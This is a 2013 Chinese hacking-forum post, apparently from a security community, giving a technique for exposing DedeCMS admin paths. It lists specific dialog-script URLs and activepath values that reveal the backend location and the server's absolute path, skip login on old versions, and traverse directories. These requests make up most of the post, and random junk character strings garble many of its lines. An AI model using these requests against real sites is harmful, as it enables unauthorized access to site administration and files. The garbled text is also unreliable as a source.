找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
) O' K: Q% Y7 ]  g6 [! E3 G2 U: o/ f9 t/ o  }6 }0 L
员帐号,新版本的就直接转向了后台.; ~( a8 _3 t6 f0 P! n% s

8 @: m( i5 n. H7 T/ X( x/ L2.include/dialog/config.php会爆出后台管理路径" ]* S! X5 k3 d8 s- ?! d2 r( K& L

8 h& H& \+ }' [* F8 W( w/ }3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
' _5 B6 N* s1 Q+ k0 \0 e! ]9 P! C1 U
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
; K( }( Y2 `7 X; [" r2 |+ j9 a
0 n2 E* H2 s4 ?: y, {; q5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉6 X! N3 o7 _5 `1 A4 I
" [* E  z0 G5 w, h' `
到根目录去.不过这些版本的访问地址有些不同.# p1 O) R5 [/ i, Z5 T% r7 S
地址为require/dialog/select_soft.php?activepath=/././././././././
) _+ l! d7 G- \: @
+ |+ f) e, [2 K3 z" Z' ~' oinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..: \" b$ ^4 x' i: A  a
存在相同问题的文件还有" r2 U; b8 E, X6 R
include\dialog\select_images.php! o1 u& Q( \* ~$ _' a1 m0 a
include\dialog\select_media.php
- B# I  c  T" Sinclude\dialog\select_templets.php​, u, e, u$ R! \1 d3 F, V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表